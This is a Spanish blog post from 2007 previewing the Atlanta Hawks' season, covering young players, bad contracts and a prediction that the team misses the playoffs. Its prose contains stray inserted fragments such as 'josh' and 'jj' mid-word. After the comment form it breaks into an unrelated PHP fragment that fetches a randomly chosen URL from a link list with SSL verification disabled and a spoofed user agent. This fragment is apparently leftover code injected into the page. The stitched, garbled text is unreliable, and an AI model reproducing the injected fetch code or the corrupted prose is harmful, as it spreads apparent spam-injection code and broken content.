Atlanta Hawks: el coleccionista de promesas y fracasos

23 de October de 2007 por MagicJohnson32

Otro año más ejerciendo de Highlight team: así es como, salvo sorpresa, transcurrirá la temporada para los Atlanta Hawks. El equipo ya cuenta conjosh jj tradición en este papel: lo que en los ’80 hicieron Dominique Wilkins y Spudd Webb hoy lo hacen, salvando las distancias, Josh Smith y Childress. Salvo por la sutil diferencia de que el equipo de los ’80 era un fijo en Playoffs y el de la actualidad es un fijo en la lotería del draft y suma cuatro temporadas consecutivas de más de 50 derrotas. La franquicia de la capital de Georgia se dedica desde hace unas temporadas a coleccionar potencial. En lugar de traspasar parte de ese talento todavía por pulir a cambio de experiencia, de añadir un poco de presente a su mucho futuro, Atlanta ha incrementado su nómina de jóvenes aún más y encara la temporada con la ilusión de recoger los frutos de su paciencia, toda la que no tuvieron en su día para administrar un margen salarial que acabaron por entregar a Joe Johnson con un contrato que en 2009-2010 aún le reportará 15 millones de dólares al ex Suns. Así que, sin más novedades que sus rookies, Atlanta volverá a ofrecer espectáculo, volverá a copar las listas de las mejores jugadas de la semana y volverá, muy probablemente, a ver los Playoffs por televisión.

Los Hawks necesitan que sucedan una serie de cosas para salir de la mediocridad en la que se hallan inmersos desde hace muchos, demasiados años. Necesitan, para empezar, que los jóvenes tomen definitivamente el mando y el técnico, Woodson, se dé cuenta de que con Lorenzen Wright, Lue, Claxton y Anthony Johnson no se va a ninguna parte; necesitan, ante todo, un base de verdad que libere a Joe Johnson de la tarea de subir el balón y crear juego. Acie Law IV, elección número 11 del pasado draft, se presenta como principal candidato para ello tras cuatro años en Texas A&M. Woodson apostará en principio por alguno de los veteranos pero debería ser cuestión de tiempo y oportunidades que Law se haga con la titularidad. Necesitan, por tanto, suerte con él y con Horford, elegido con el número 3 y que debe aportar consistencia y equilibrio al maltrecho juego interior de los Halcones.josh Si demuestra en la fase regular lo que ya está dejando ver en los partidos de exhibición y Pachulia, teórico titular, logra mantenerse sano y con la buena línea que tomó el año pasado, Lorenzen Wright desaparecerá de las rotaciones habituales.

Necesitan también que sus jóvenes sigan creciendo: Marvin & Shelden Williams, Pachulia, Childress y, especialmente, Josh Smith: cumplirá 22 en diciembre, su potencial es gigantesco pero aún ha de progresar en muchos aspectos, ganar solidez en el lanzamiento y seguir sacando todo el rendimiento a ese físico extraordinario que posee. Espectacular como pocos, Smith aporta la capacidad de intimidación de la que carecen los interiores de los Hawks: casi 3 tapones por partido colocó la pasada temporada, además de lograr 16.4 puntos, 8.6 rebotes, 3.3 asistencias y 1.4 robos, respondiendo a la baja por lesión de Joe Johnson durante todo el tramo final de la fase regular. Su polivalencia permite a Woodson apostar por el small-ball, con Smith y Marvin Williams tratando de aportar la dureza interior que sólo el irregular Shelden Williams es capaz de ofrecer cuando da su mejor versión (como en los cinco últimos partidos de la pasada campaña, en los que promedió 15.6 puntos y 11.2 rebotes).

Por su parte, Joe Johnson es el líder de los Hawks sobre el parquet: 25 puntos y 4.4 asistencias en más de 41 minutos fueron sus promedios en los 57 partidos que jugó en la 06-07. El equipo depende en exceso jjdel rendimiento de JJ y Josh Smith: el año pasado entre ambos promediaron casi 48 puntos en las victorias y sólo 37.5 en las derrotas. Pese a ello, se trata de dos valores seguros, los únicos con los que cuentan los Hawks. El resto es un cúmulo de necesidades, incógnitas y esperanzas para una franquicia que no pisa los Playoffs desde la marcha del entonces emblemático Steve Smith, traspasado a cambio de Isaiah Rider y Jim Jackson (Rider apenas duró en Atlanta unos meses antes de que la franquicia lo echase por acumular su tradicional currículo de retrasos, desplantes, consumo de marihuana y demás comportamientos entre lo cuestionable y lo directamente ilegal). Aquello sucedió en la temporada del lock-out, que supuso para los Hawks el inicio de un largo túnel cuyo final empieza a asomar. Desde el ridículo de la 04-05, cuando los Hawks de Antoine Walker, Al Harrington, Boris Diaw, los rookies Smith y Childress y el fallecido Collier firmaron un balance de 13-69, el equipo no ha hecho más que progresar y sólo la lesión de Joe Johnson impidió que mejorase el 30-52 con que finalizó la campaña pasada. Además, al término de la 07-08 se liberará de los contratos de Lue, Wright y Anthony Johnson (un total que ronda los 9,5 millones), y tendrá que afrontar las renovaciones de los dos Josh, agentes libres restringidos. Si se mueve bien y es capaz de quitarse de encima el demencial contrato de Claxton (le quedan por cobrar 17 millones en 3 temporadas) puede convertirse en uno de los protagonistas del mercado veraniego.

Pero eso está por ver, ya que Atlanta no se ha caracterizado por una brillante toma de decisiones, aunque los problemas legales que mantienen los propietarios no deben de contribuir demasiado a la causa: ¿qué haría un equipo sin un solo base decente ante la difícil, crucial decisión de elegir entre Chris Paul y Deron Williams? Atlanta, con la elección número 2 del draft de 2005, eligió a Marvin Williams. Y así les va.

 Quinteto inicial: Lue, Joe Johnson, Smith, Marvin Williams y Pachulia.

 Sexto hombre: Shelden Williams/Horford

 Predicción: Fuera de Playoffs

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>